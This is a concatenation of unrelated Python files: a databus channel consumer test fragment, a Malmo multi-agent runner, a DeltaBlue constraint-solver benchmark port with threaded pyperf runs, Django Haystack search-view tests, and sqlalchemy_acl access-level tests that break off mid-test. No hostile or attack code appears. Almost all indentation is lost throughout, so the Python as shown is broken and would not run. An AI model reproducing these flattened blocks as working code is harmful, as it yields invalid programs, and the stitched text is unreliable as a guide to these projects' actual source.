response_mock.status_code = 200
response_mock.json = MagicMock(return_value=response_json)
return response_mock
session.return_value.request.side_effect = on_request
channel = Channel(self.url,
auth=auth,
consumer_group=self.consumer_group,
retry_on_fail=False)
def on_consume(_):
return True
run_stopped = [False]
def run_worker():
channel.run(on_consume, wait_between_queries=30,
topics=["topic1", "topic2", "topic3"])
run_stopped[0] = True
thread = threading.Thread(target=run_worker)
thread.daemon = True
thread.start()
# Wait for the channel create, subscribe, and first consume
# (records) call to be made
while len(session.return_value.request.mock_calls) < 3:
time.sleep(0.1)
self.assertFalse(run_stopped[0])
channel.stop()
thread.join()
self.assertTrue(run_stopped[0])
session.return_value.request.assert_any_call(
"post",
"http://localhost/databus/consumer-service/v1/consumers/1234/subscription",
json={"topics": ["topic1", "topic2", "topic3"]}
)
|
runmultiagent.py
|
# ------------------------------------------------------------------------------------------------
# Copyright (c) 2018 Microsoft Corporation
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and
# associated documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish, distribute,
# sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT
# NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# ------------------------------------------------------------------------------------------------
import malmoenv
import argparse
from pathlib import Path
import time
from lxml import etree
from threading import Thread
import threading
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='malmoenv test')
parser.add_argument('--mission', type=str, default='missions/mobchase_single_agent.xml', help='the mission xml')
parser.add_argument('--port', type=int, default=9000, help='the mission server port')
parser.add_argument('--server', type=str, default='127.0.0.1', help='the mission server DNS or IP address')
parser.add_argument('--server2', type=str, default=None, help="(Multi-agent) role N's server DNS or IP")
parser.add_argument('--port2', type=int, default=9000, help="(Multi-agent) role N's mission port")
parser.add_argument('--episodes', type=int, default=1, help='the number of resets to perform - default is 1')
parser.add_argument('--episode', type=int, default=0, help='the start episode - default is 0')
parser.add_argument('--resync', type=int, default=0, help='exit and re-sync on every N - default 0 meaning never')
parser.add_argument('--experimentUniqueId', type=str, default='test1', help="the experiment's unique id.")
args = parser.parse_args()
if args.server2 is None:
args.server2 = args.server
xml = Path(args.mission).read_text()
mission = etree.fromstring(xml)
number_of_agents = len(mission.findall('{http://ProjectMalmo.microsoft.com}AgentSection'))
print("number of agents: " + str(number_of_agents))
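    # Each agent role i started below connects with port2 = args.port + i (see
    # env.init in run()), so a two-agent mission would use ports 9000 and 9001
    # by default.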
def run(role):
env = malmoenv.make()
env.init(xml,
args.port, server=args.server,
server2=args.server2, port2=(args.port + role),
role=role,
exp_uid=args.experimentUniqueId,
episode=args.episode, resync=args.resync)
def log(message):
print('[' + str(role) + '] ' + message)
for r in range(args.episodes):
log("reset " + str(r))
env.reset()
steps = 0
done = False
while not done:
steps += 1
action = env.action_space.sample()
log(str(steps) + " action: " + str(action))
obs, reward, done, info = env.step(action)
# log("reward: " + str(reward))
# log("done: " + str(done))
# log("info: " + str(info))
# log(" obs: " + str(obs))
time.sleep(.05)
env.close()
threads = [Thread(target=run, args=(i,)) for i in range(number_of_agents)]
[t.start() for t in threads]
[t.join() for t in threads]
|
bm_deltablue.py
|
"""
deltablue.py
============
Ported for the PyPy project.
Contributed by Daniel Lindsley
This implementation of the DeltaBlue benchmark was directly ported
from the `V8's source code`_, which was in turn derived
from the Smalltalk implementation by John Maloney and Mario
Wolczko. The original Javascript implementation was licensed under the GPL.
It's been updated in places to be more idiomatic to Python (for loops over
collections, a couple magic methods, ``OrderedCollection`` being a list & things
altering those collections changed to the builtin methods) but largely retains
the layout & logic from the original. (Ugh.)
.. _`V8's source code`: (https://github.com/v8/v8/blob/master/benchmarks/deltablue.js)
"""
from __future__ import print_function
from mpkmemalloc import *
import os
import gc
import threading
import psutil
import pyperf
# The JS variant implements "OrderedCollection", which basically completely
# overlaps with ``list``. So we'll cheat. :D
class OrderedCollection(list):
pass
class Strength(object):
REQUIRED = None
STRONG_PREFERRED = None
PREFERRED = None
STRONG_DEFAULT = None
NORMAL = None
WEAK_DEFAULT = None
WEAKEST = None
def __init__(self, strength, name):
super(Strength, self).__init__()
self.strength = strength
self.name = name
@classmethod
def stronger(cls, s1, s2):
return s1.strength < s2.strength
@classmethod
def weaker(cls, s1, s2):
return s1.strength > s2.strength
@classmethod
def weakest_of(cls, s1, s2):
if cls.weaker(s1, s2):
return s1
return s2
@classmethod
def strongest(cls, s1, s2):
if cls.stronger(s1, s2):
return s1
return s2
def next_weaker(self):
strengths = {
0: self.__class__.WEAKEST,
1: self.__class__.WEAK_DEFAULT,
2: self.__class__.NORMAL,
3: self.__class__.STRONG_DEFAULT,
4: self.__class__.PREFERRED,
            # TODO: This looks like a bug in the original code. Shouldn't this be
            # ``STRONG_PREFERRED``? Keeping it for porting's sake...
5: self.__class__.REQUIRED,
}
return strengths[self.strength]
# This is a terrible pattern IMO, but true to the original JS implementation.
Strength.REQUIRED = Strength(0, "required")
Strength.STRONG_PREFERRED = Strength(1, "strongPreferred")
Strength.PREFERRED = Strength(2, "preferred")
Strength.STRONG_DEFAULT = Strength(3, "strongDefault")
Strength.NORMAL = Strength(4, "normal")
Strength.WEAK_DEFAULT = Strength(5, "weakDefault")
Strength.WEAKEST = Strength(6, "weakest")
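# Lower numeric values denote stronger strengths, so the comparisons above are
# intentionally inverted: Strength.stronger(Strength.REQUIRED, Strength.NORMAL)
# is True because 0 < 4.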
class Constraint(object):
def __init__(self, strength):
super(Constraint, self).__init__()
self.strength = strength
def add_constraint(self):
global planner
self.add_to_graph()
planner.incremental_add(self)
def satisfy(self, mark):
global planner
self.choose_method(mark)
if not self.is_satisfied():
if self.strength == Strength.REQUIRED:
print('Could not satisfy a required constraint!')
return None
self.mark_inputs(mark)
out = self.output()
overridden = out.determined_by
if overridden is not None:
overridden.mark_unsatisfied()
out.determined_by = self
if not planner.add_propagate(self, mark):
print('Cycle encountered')
out.mark = mark
return overridden
def destroy_constraint(self):
global planner
if self.is_satisfied():
planner.incremental_remove(self)
else:
self.remove_from_graph()
def is_input(self):
return False
class UrnaryConstraint(Constraint):
def __init__(self, v, strength):
super(UrnaryConstraint, self).__init__(strength)
self.my_output = v
self.satisfied = False
self.add_constraint()
def add_to_graph(self):
self.my_output.add_constraint(self)
self.satisfied = False
def choose_method(self, mark):
if self.my_output.mark != mark and \
Strength.stronger(self.strength, self.my_output.walk_strength):
self.satisfied = True
else:
self.satisfied = False
def is_satisfied(self):
return self.satisfied
def mark_inputs(self, mark):
# No-ops.
pass
def output(self):
# Ugh. Keeping it for consistency with the original. So much for
# "we're all adults here"...
return self.my_output
def recalculate(self):
self.my_output.walk_strength = self.strength
self.my_output.stay = not self.is_input()
if self.my_output.stay:
self.execute()
def mark_unsatisfied(self):
self.satisfied = False
def inputs_known(self, mark):
return True
def remove_from_graph(self):
if self.my_output is not None:
self.my_output.remove_constraint(self)
self.satisfied = False
class StayConstraint(UrnaryConstraint):
def __init__(self, v, string):
super(StayConstraint, self).__init__(v, string)
def execute(self):
# The methods, THEY DO NOTHING.
pass
class EditConstraint(UrnaryConstraint):
def __init__(self, v, string):
super(EditConstraint, self).__init__(v, string)
def is_input(self):
return True
def execute(self):
# This constraint also does nothing.
pass
class Direction(object):
# Hooray for things that ought to be structs!
NONE = 0
FORWARD = 1
BACKWARD = -1
class BinaryConstraint(Constraint):
def __init__(self, v1, v2, strength):
super(BinaryConstraint, self).__init__(strength)
self.v1 = v1
self.v2 = v2
self.direction = Direction.NONE
self.add_constraint()
def choose_method(self, mark):
if self.v1.mark == mark:
if self.v2.mark != mark and Strength.stronger(self.strength, self.v2.walk_strength):
self.direction = Direction.FORWARD
else:
self.direction = Direction.BACKWARD
if self.v2.mark == mark:
if self.v1.mark != mark and Strength.stronger(self.strength, self.v1.walk_strength):
self.direction = Direction.BACKWARD
else:
self.direction = Direction.NONE
if Strength.weaker(self.v1.walk_strength, self.v2.walk_strength):
if Strength.stronger(self.strength, self.v1.walk_strength):
self.direction = Direction.BACKWARD
else:
self.direction = Direction.NONE
else:
if Strength.stronger(self.strength, self.v2.walk_strength):
self.direction = Direction.FORWARD
else:
self.direction = Direction.BACKWARD
def add_to_graph(self):
self.v1.add_constraint(self)
self.v2.add_constraint(self)
self.direction = Direction.NONE
def is_satisfied(self):
return self.direction != Direction.NONE
def mark_inputs(self, mark):
self.input().mark = mark
def input(self):
if self.direction == Direction.FORWARD:
return self.v1
return self.v2
def output(self):
if self.direction == Direction.FORWARD:
return self.v2
return self.v1
def recalculate(self):
ihn = self.input()
out = self.output()
out.walk_strength = Strength.weakest_of(
self.strength, ihn.walk_strength)
out.stay = ihn.stay
if out.stay:
self.execute()
def mark_unsatisfied(self):
self.direction = Direction.NONE
def inputs_known(self, mark):
i = self.input()
return i.mark == mark or i.stay or i.determined_by is None
def remove_from_graph(self):
if self.v1 is not None:
self.v1.remove_constraint(self)
if self.v2 is not None:
self.v2.remove_constraint(self)
self.direction = Direction.NONE
class ScaleConstraint(BinaryConstraint):
def __init__(self, src, scale, offset, dest, strength):
self.direction = Direction.NONE
self.scale = scale
self.offset = offset
super(ScaleConstraint, self).__init__(src, dest, strength)
def add_to_graph(self):
super(ScaleConstraint, self).add_to_graph()
self.scale.add_constraint(self)
self.offset.add_constraint(self)
def remove_from_graph(self):
super(ScaleConstraint, self).remove_from_graph()
if self.scale is not None:
self.scale.remove_constraint(self)
if self.offset is not None:
self.offset.remove_constraint(self)
def mark_inputs(self, mark):
super(ScaleConstraint, self).mark_inputs(mark)
self.scale.mark = mark
self.offset.mark = mark
def execute(self):
if self.direction == Direction.FORWARD:
self.v2.value = self.v1.value * self.scale.value + self.offset.value
else:
self.v1.value = (
self.v2.value - self.offset.value) / self.scale.value
def recalculate(self):
ihn = self.input()
out = self.output()
out.walk_strength = Strength.weakest_of(
self.strength, ihn.walk_strength)
out.stay = ihn.stay and self.scale.stay and self.offset.stay
if out.stay:
self.execute()
class EqualityConstraint(BinaryConstraint):
def execute(self):
self.output().value = self.input().value
class Variable(object):
def __init__(self, name, initial_value=0):
super(Variable, self).__init__()
self.name = name
self.value = initial_value
self.constraints = OrderedCollection()
self.determined_by = None
self.mark = 0
self.walk_strength = Strength.WEAKEST
self.stay = True
def __repr__(self):
# To make debugging this beast from pdb easier...
return '<Variable: %s - %s>' % (
self.name,
self.value
)
def add_constraint(self, constraint):
self.constraints.append(constraint)
def remove_constraint(self, constraint):
self.constraints.remove(constraint)
if self.determined_by == constraint:
self.determined_by = None
class Planner(object):
def __init__(self):
super(Planner, self).__init__()
self.current_mark = 0
def incremental_add(self, constraint):
mark = self.new_mark()
overridden = constraint.satisfy(mark)
while overridden is not None:
overridden = overridden.satisfy(mark)
def incremental_remove(self, constraint):
out = constraint.output()
constraint.mark_unsatisfied()
constraint.remove_from_graph()
unsatisfied = self.remove_propagate_from(out)
strength = Strength.REQUIRED
# Do-while, the Python way.
repeat = True
while repeat:
for u in unsatisfied:
if u.strength == strength:
self.incremental_add(u)
strength = strength.next_weaker()
repeat = strength != Strength.WEAKEST
def new_mark(self):
self.current_mark += 1
return self.current_mark
def make_plan(self, sources):
mark = self.new_mark()
plan = Plan()
todo = sources
while len(todo):
c = todo.pop(0)
if c.output().mark != mark and c.inputs_known(mark):
plan.add_constraint(c)
c.output().mark = mark
self.add_constraints_consuming_to(c.output(), todo)
return plan
def extract_plan_from_constraints(self, constraints):
sources = OrderedCollection()
for c in constraints:
if c.is_input() and c.is_satisfied():
sources.append(c)
return self.make_plan(sources)
def add_propagate(self, c, mark):
todo = OrderedCollection()
todo.append(c)
while len(todo):
d = todo.pop(0)
if d.output().mark == mark:
self.incremental_remove(c)
return False
d.recalculate()
self.add_constraints_consuming_to(d.output(), todo)
return True
def remove_propagate_from(self, out):
out.determined_by = None
out.walk_strength = Strength.WEAKEST
out.stay = True
unsatisfied = OrderedCollection()
todo = OrderedCollection()
todo.append(out)
while len(todo):
v = todo.pop(0)
for c in v.constraints:
if not c.is_satisfied():
unsatisfied.append(c)
determining = v.determined_by
for c in v.constraints:
if c != determining and c.is_satisfied():
c.recalculate()
todo.append(c.output())
return unsatisfied
def add_constraints_consuming_to(self, v, coll):
determining = v.determined_by
cc = v.constraints
for c in cc:
if c != determining and c.is_satisfied():
# I guess we're just updating a reference (``coll``)? Seems
# inconsistent with the rest of the implementation, where they
# return the lists...
coll.append(c)
class Plan(object):
def __init__(self):
super(Plan, self).__init__()
self.v = OrderedCollection()
def add_constraint(self, c):
self.v.append(c)
def __len__(self):
return len(self.v)
def __getitem__(self, index):
return self.v[index]
def execute(self):
for c in self.v:
c.execute()
# Main
def chain_test(n):
"""
This is the standard DeltaBlue benchmark. A long chain of equality
constraints is constructed with a stay constraint on one end. An
edit constraint is then added to the opposite end and the time is
measured for adding and removing this constraint, and extracting
and executing a constraint satisfaction plan. There are two cases.
In case 1, the added constraint is stronger than the stay
constraint and values must propagate down the entire length of the
chain. In case 2, the added constraint is weaker than the stay
constraint so it cannot be accommodated. The cost in this case is,
of course, very low. Typical situations lie somewhere between these
two extremes.
"""
global planner
planner = Planner()
prev, first, last = None, None, None
# We need to go up to n inclusively.
for i in range(n + 1):
name = "v%s" % i
v = Variable(name)
if prev is not None:
EqualityConstraint(prev, v, Strength.REQUIRED)
if i == 0:
first = v
if i == n:
last = v
prev = v
StayConstraint(last, Strength.STRONG_DEFAULT)
edit = EditConstraint(first, Strength.PREFERRED)
edits = OrderedCollection()
edits.append(edit)
plan = planner.extract_plan_from_constraints(edits)
for i in range(100):
first.value = i
plan.execute()
if last.value != i:
print("Chain test failed.")
def projection_test(n):
"""
This test constructs two sets of variables related to each
other by a simple linear transformation (scale and offset). The
time is measured to change a variable on either side of the
mapping and to change the scale and offset factors.
"""
global planner
planner = Planner()
scale = Variable("scale", 10)
offset = Variable("offset", 1000)
src = None
dests = OrderedCollection()
for i in range(n):
src = Variable("src%s" % i, i)
dst = Variable("dst%s" % i, i)
dests.append(dst)
StayConstraint(src, Strength.NORMAL)
ScaleConstraint(src, scale, offset, dst, Strength.REQUIRED)
change(src, 17)
if dst.value != 1170:
print("Projection 1 failed")
change(dst, 1050)
if src.value != 5:
print("Projection 2 failed")
change(scale, 5)
for i in range(n - 1):
if dests[i].value != (i * 5 + 1000):
print("Projection 3 failed")
change(offset, 2000)
for i in range(n - 1):
if dests[i].value != (i * 5 + 2000):
print("Projection 4 failed")
def change(v, new_value):
global planner
edit = EditConstraint(v, Strength.PREFERRED)
edits = OrderedCollection()
edits.append(edit)
plan = planner.extract_plan_from_constraints(edits)
for i in range(10):
v.value = new_value
plan.execute()
edit.destroy_constraint()
# HOORAY FOR GLOBALS... Oh wait.
# In the spirit of the original, we'll keep it, but ugh.
planner = None
def delta_blue(n):
chain_test(n)
projection_test(n)
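# A minimal, hypothetical usage sketch of the solver above (not part of the
# benchmark). The global ``planner`` must be set before constraints are
# created, since constraints register themselves with it on construction,
# exactly as chain_test() does above:
#
#   planner = Planner()
#   a, b = Variable("a", 1), Variable("b", 2)
#   EqualityConstraint(a, b, Strength.REQUIRED)   # keeps a == b
#   edit = EditConstraint(a, Strength.PREFERRED)  # lets us drive ``a``
#   plan = planner.extract_plan_from_constraints([edit])
#   a.value = 42
#   plan.execute()                                # propagates 42 into ``b``
#   edit.destroy_constraint()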
# if __name__ == "__main__":
def functionWorker(tname, allocate_pkey):
if allocate_pkey:
pkey_thread_mapper(tname)
runner = pyperf.Runner(loops=1)
runner.metadata['description'] = "DeltaBlue benchmark"
n = 100
runner.bench_func('deltablue', delta_blue, n)
del runner
pymem_reset()
def dummyFunc(name):
pass
def main(params):
pymem_setup_allocators(0)
gc.disable()
workers = len(params) if (len(params)>0) else 1
runner = pyperf.Runner(loops = 1)
runner.argparser.add_argument("--cases")
runner.bench_func("Dummy init", dummyFunc, "main")
del runner
threads = []
for i in range(workers):
tname = 'Worker' + str(i)
threads.append(threading.Thread(target=functionWorker, args=[tname,1], name=tname))
for idx, thread in enumerate(threads):
thread.start()
thread.join()
pymem_reset_pkru()
result = {}
for activation in params:
result[activation] = "Finished thread execution"
process = psutil.Process(os.getpid())
print((process.memory_info().rss)/1024) # in bytes
return(result)
# if __name__ == '__main__':
# out = main({'activation1':{},'activation3':{},'activation4':{}, 'activation2': {},
# 'activation31':{},'activation33':{},'activation34':{}, 'activation32': {},
# 'activation45':{},'activation46':{},'activation47':{}, 'activation48': {}})
# process = psutil.Process(os.getpid())
# print((process.memory_info().rss)/1024) # in bytes
|
test_views.py
|
# encoding: utf-8
from __future__ import absolute_import, division, print_function, unicode_literals
import time
from threading import Thread
from django import forms
from django.core.urlresolvers import reverse
from django.http import HttpRequest, QueryDict
from django.test import TestCase, override_settings
from django.utils.six.moves import queue
from test_haystack.core.models import AnotherMockModel, MockModel
from haystack import connections, indexes
from haystack.forms import FacetedSearchForm, ModelSearchForm, SearchForm
from haystack.query import EmptySearchQuerySet
from haystack.utils.loading import UnifiedIndex
from haystack.views import FacetedSearchView, SearchView, search_view_factory
class InitialedSearchForm(SearchForm):
q = forms.CharField(initial='Search for...', required=False, label='Search')
class BasicMockModelSearchIndex(indexes.BasicSearchIndex, indexes.Indexable):
def get_model(self):
return MockModel
class BasicAnotherMockModelSearchIndex(indexes.BasicSearchIndex, indexes.Indexable):
def get_model(self):
return AnotherMockModel
class SearchViewTestCase(TestCase):
fixtures = ['base_data']
def setUp(self):
super(SearchViewTestCase, self).setUp()
# Stow.
self.old_unified_index = connections['default']._index
self.ui = UnifiedIndex()
self.bmmsi = BasicMockModelSearchIndex()
self.bammsi = BasicAnotherMockModelSearchIndex()
self.ui.build(indexes=[self.bmmsi, self.bammsi])
connections['default']._index = self.ui
# Update the "index".
backend = connections['default'].get_backend()
backend.clear()
backend.update(self.bmmsi, MockModel.objects.all())
def tearDown(self):
connections['default']._index = self.old_unified_index
super(SearchViewTestCase, self).tearDown()
def test_search_no_query(self):
response = self.client.get(reverse('haystack_search'))
self.assertEqual(response.status_code, 200)
def test_search_query(self):
response = self.client.get(reverse('haystack_search'), {'q': 'haystack'})
self.assertEqual(response.status_code, 200)
self.assertIn('page', response.context)
self.assertNotIn('page_obj', response.context)
self.assertEqual(len(response.context[-1]['page'].object_list), 3)
self.assertEqual(response.context[-1]['page'].object_list[0].content_type(), u'core.mockmodel')
self.assertEqual(response.context[-1]['page'].object_list[0].pk, '1')
def test_invalid_page(self):
response = self.client.get(reverse('haystack_search'), {'q': 'haystack', 'page': '165233'})
self.assertEqual(response.status_code, 404)
def test_empty_results(self):
sv = SearchView()
sv.request = HttpRequest()
sv.form = sv.build_form()
self.assertTrue(isinstance(sv.get_results(), EmptySearchQuerySet))
def test_initial_data(self):
sv = SearchView(form_class=InitialedSearchForm)
sv.request = HttpRequest()
form = sv.build_form()
self.assertTrue(isinstance(form, InitialedSearchForm))
self.assertEqual(form.fields['q'].initial, 'Search for...')
para = form.as_p()
self.assertTrue(u'<label for="id_q">Search:</label>' in para)
self.assertTrue(u'value="Search for..."' in para)
def test_pagination(self):
response = self.client.get(reverse('haystack_search'), {'q': 'haystack', 'page': 0})
self.assertEqual(response.status_code, 404)
response = self.client.get(reverse('haystack_search'), {'q': 'haystack', 'page': 1})
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context[-1]['page'].object_list), 3)
response = self.client.get(reverse('haystack_search'), {'q': 'haystack', 'page': 2})
self.assertEqual(response.status_code, 404)
def test_thread_safety(self):
exceptions = []
def threaded_view(resp_queue, view, request):
time.sleep(2)
try:
view(request)
resp_queue.put(request.GET['name'])
except Exception as e:
exceptions.append(e)
raise
class ThreadedSearchView(SearchView):
def __call__(self, request):
print("Name: %s" % request.GET['name'])
return super(ThreadedSearchView, self).__call__(request)
view = search_view_factory(view_class=ThreadedSearchView)
resp_queue = queue.Queue()
request_1 = HttpRequest()
request_1.GET = {'name': 'foo'}
request_2 = HttpRequest()
request_2.GET = {'name': 'bar'}
th1 = Thread(target=threaded_view, args=(resp_queue, view, request_1))
th2 = Thread(target=threaded_view, args=(resp_queue, view, request_2))
th1.start()
th2.start()
th1.join()
th2.join()
foo = resp_queue.get()
bar = resp_queue.get()
self.assertNotEqual(foo, bar)
def test_spelling(self):
# Stow.
from django.conf import settings
old = settings.HAYSTACK_CONNECTIONS['default'].get('INCLUDE_SPELLING', None)
settings.HAYSTACK_CONNECTIONS['default']['INCLUDE_SPELLING'] = True
sv = SearchView()
sv.query = 'Nothing'
sv.results = []
sv.build_page = lambda: (None, None)
sv.create_response()
context = sv.get_context()
self.assertIn('suggestion', context,
msg='Spelling suggestions should be present even if'
' no results were returned')
self.assertEqual(context['suggestion'], None)
# Restore
settings.HAYSTACK_CONNECTIONS['default']['INCLUDE_SPELLING'] = old
if old is None:
del settings.HAYSTACK_CONNECTIONS['default']['INCLUDE_SPELLING']
@override_settings(ROOT_URLCONF='test_haystack.results_per_page_urls')
class ResultsPerPageTestCase(TestCase):
fixtures = ['base_data']
def setUp(self):
super(ResultsPerPageTestCase, self).setUp()
# Stow.
self.old_unified_index = connections['default']._index
self.ui = UnifiedIndex()
self.bmmsi = BasicMockModelSearchIndex()
self.bammsi = BasicAnotherMockModelSearchIndex()
self.ui.build(indexes=[self.bmmsi, self.bammsi])
connections['default']._index = self.ui
# Update the "index".
backend = connections['default'].get_backend()
backend.clear()
backend.update(self.bmmsi, MockModel.objects.all())
def tearDown(self):
connections['default']._index = self.old_unified_index
super(ResultsPerPageTestCase, self).tearDown()
def test_custom_results_per_page(self):
response = self.client.get('/search/', {'q': 'haystack'})
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context[-1]['page'].object_list), 1)
self.assertEqual(response.context[-1]['paginator'].per_page, 1)
response = self.client.get('/search2/', {'q': 'hello world'})
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context[-1]['page'].object_list), 2)
self.assertEqual(response.context[-1]['paginator'].per_page, 2)
class FacetedSearchViewTestCase(TestCase):
def setUp(self):
super(FacetedSearchViewTestCase, self).setUp()
# Stow.
self.old_unified_index = connections['default']._index
self.ui = UnifiedIndex()
self.bmmsi = BasicMockModelSearchIndex()
self.bammsi = BasicAnotherMockModelSearchIndex()
self.ui.build(indexes=[self.bmmsi, self.bammsi])
connections['default']._index = self.ui
# Update the "index".
backend = connections['default'].get_backend()
backend.clear()
backend.update(self.bmmsi, MockModel.objects.all())
def tearDown(self):
connections['default']._index = self.old_unified_index
super(FacetedSearchViewTestCase, self).tearDown()
def test_search_no_query(self):
response = self.client.get(reverse('haystack_faceted_search'))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['facets'], {})
def test_empty_results(self):
fsv = FacetedSearchView()
fsv.request = HttpRequest()
fsv.request.GET = QueryDict('')
fsv.form = fsv.build_form()
self.assertTrue(isinstance(fsv.get_results(), EmptySearchQuerySet))
def test_default_form(self):
fsv = FacetedSearchView()
fsv.request = HttpRequest()
fsv.request.GET = QueryDict('')
fsv.form = fsv.build_form()
self.assertTrue(isinstance(fsv.form, FacetedSearchForm))
def test_list_selected_facets(self):
fsv = FacetedSearchView()
fsv.request = HttpRequest()
fsv.request.GET = QueryDict('')
fsv.form = fsv.build_form()
self.assertEqual(fsv.form.selected_facets, [])
fsv = FacetedSearchView()
fsv.request = HttpRequest()
fsv.request.GET = QueryDict('selected_facets=author:daniel&selected_facets=author:chris')
fsv.form = fsv.build_form()
self.assertEqual(fsv.form.selected_facets, [u'author:daniel', u'author:chris'])
class BasicSearchViewTestCase(TestCase):
fixtures = ['base_data']
def setUp(self):
super(BasicSearchViewTestCase, self).setUp()
# Stow.
self.old_unified_index = connections['default']._index
self.ui = UnifiedIndex()
self.bmmsi = BasicMockModelSearchIndex()
self.bammsi = BasicAnotherMockModelSearchIndex()
self.ui.build(indexes=[self.bmmsi, self.bammsi])
connections['default']._index = self.ui
# Update the "index".
backend = connections['default'].get_backend()
backend.clear()
backend.update(self.bmmsi, MockModel.objects.all())
def tearDown(self):
connections['default']._index = self.old_unified_index
super(BasicSearchViewTestCase, self).tearDown()
def test_search_no_query(self):
response = self.client.get(reverse('haystack_basic_search'))
self.assertEqual(response.status_code, 200)
def test_search_query(self):
response = self.client.get(reverse('haystack_basic_search'), {'q': 'haystack'})
self.assertEqual(response.status_code, 200)
self.assertEqual(type(response.context[-1]['form']), ModelSearchForm)
self.assertEqual(len(response.context[-1]['page'].object_list), 3)
self.assertEqual(response.context[-1]['page'].object_list[0].content_type(), u'core.mockmodel')
self.assertEqual(response.context[-1]['page'].object_list[0].pk, '1')
self.assertEqual(response.context[-1]['query'], u'haystack')
def test_invalid_page(self):
response = self.client.get(reverse('haystack_basic_search'), {'q': 'haystack', 'page': '165233'})
self.assertEqual(response.status_code, 404)
|
unit_tests.py
|
import sys, unittest
sys.path.insert(0,'../..')
sys.path.insert(1,'..')
from legacy_test.setup import DefaultSetupMixin, ParseYAMLSetupMixin, PostgresSetupMixin
from legacy_test.models import ExemplaryModel, CustomersModel, OrdersModel, ArticlesModel
from sqlalchemy_acl import ACL
from sqlalchemy import func
from random import randrange
class StandardQueriesTestCase(ParseYAMLSetupMixin, unittest.TestCase):
def test_get_users(self):
# print(ACL.AccessLevels.get())
# get all available users, for this setup case
users = ACL.Users.get()
self.assertIsInstance(users, list)
self.assertTrue(users)
[self.assertIsInstance(user, ACL.UserModel) for user in users]
def test_add_users(self):
ex_user = ACL.UserModel(username='example_user')
ACL.Users.add([ex_user])
self.assertEqual(ACL.Users.get(username='example_user'), ex_user)
def test_get_objects(self):
# objects associated with root access level
root_level_objects = [
ExemplaryModel(id=1, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=2, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=3, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=4, string_field='some_string', integer_field=randrange(100000)),
]
self.session.add_all(root_level_objects)
self.session.commit()
# user at one of lowest access-levels
some_user = ACL.Users.get(username='tradsjun1')
other_level_objects = [
ExemplaryModel(id=5, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=6, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=7, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=8, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=9, string_field='some_string', integer_field=randrange(100000)),
]
ACL.set_user(some_user)
self.session.add_all(other_level_objects)
self.session.commit()
ACL.unset_user()
# set admin user
ACL.set_user(ACL.Users.get(username='chair2'))
# check if all added entries are accessible for admin (root access-level user)
self.assertEqual(self.session.query(ExemplaryModel).all(), root_level_objects + other_level_objects)
ACL.unset_user()
# set exemplary user
ACL.set_user(some_user)
# check if entries added by exemplary user are accessible for him
self.assertEqual(self.session.query(ExemplaryModel).all(), other_level_objects)
ACL.unset_user()
# set other exemplary user at same access-level
ACL.set_user(ACL.Users.get(username='tradsjun2'))
self.assertEqual(self.session.query(ExemplaryModel).all(), other_level_objects)
ACL.unset_user()
# set other exemplary user at different access-level
ACL.set_user(ACL.Users.get(username='accountint'))
# this user shouldn't have access to any entries
self.assertEqual(self.session.query(ExemplaryModel).all(), [])
self.assertNotEqual(self.session.query(ExemplaryModel), other_level_objects)
ACL.unset_user()
def test_delete_object_with_select(self):
# objects associated with root access level
root_level_objects = [
ExemplaryModel(id=1, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=2, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=3, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=4, string_field='some_string', integer_field=randrange(100000)),
]
self.session.add_all(root_level_objects)
self.session.commit()
ACL.set_user(ACL.Users.get(username='chair1'))
# get first object (object with id = 1)
object = self.session.query(ExemplaryModel).get(1)
# delete object and commit changes to database
self.session.delete(object)
self.session.commit()
# create set corresponding to initial list without first object
after_deletion = set(root_level_objects) - {object}
# assert with select query result
self.assertEqual(after_deletion, set(self.session.query(ExemplaryModel).all()))
ACL.unset_user()
def test_delete_object_without_select(self):
# objects associated with root access level
root_level_objects = [
ExemplaryModel(id=1, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=2, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=3, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=4, string_field='some_string', integer_field=randrange(100000)),
]
self.session.add_all(root_level_objects)
self.session.commit()
ACL.set_user(ACL.Users.get(username='chair1'))
# delete object with id = 1
self.session.query(ExemplaryModel).filter_by(id=1).delete()
self.session.commit()
after_deletion = self.session.query(ExemplaryModel).filter(ExemplaryModel.id.in_([2,3,4]))
self.assertEqual(set(after_deletion), set(self.session.query(ExemplaryModel).all()))
ACL.unset_user()
# DELETE: a higher-level user deletes records created by a lower-level user
def test_authorized_delete(self):
ACL.set_user(ACL.Users.get(username='tradsjun2'))
low_level_objects = [
ExemplaryModel(id=1, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=2, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=3, string_field='some_string', integer_field=randrange(100000)),
ExemplaryModel(id=4, string_field='some_string', integer_field=randrange(100000)),
]
